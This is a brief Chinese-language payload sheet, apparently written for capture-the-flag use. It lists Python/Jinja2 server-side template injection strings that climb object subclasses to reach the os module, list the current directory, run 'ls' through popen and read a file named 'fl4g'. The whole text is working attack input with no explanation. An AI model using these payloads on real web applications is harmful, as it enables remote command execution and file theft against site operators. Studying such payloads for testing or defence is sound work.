查看当前目录

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

或

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

读取此文件

<type 'file'> :
{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

或

<class 'site._Printer'> :
{{[].__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}